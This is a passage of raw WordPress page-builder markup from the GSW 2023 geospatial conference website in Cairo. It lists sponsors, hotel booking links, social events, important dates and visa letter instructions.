style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\">><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column 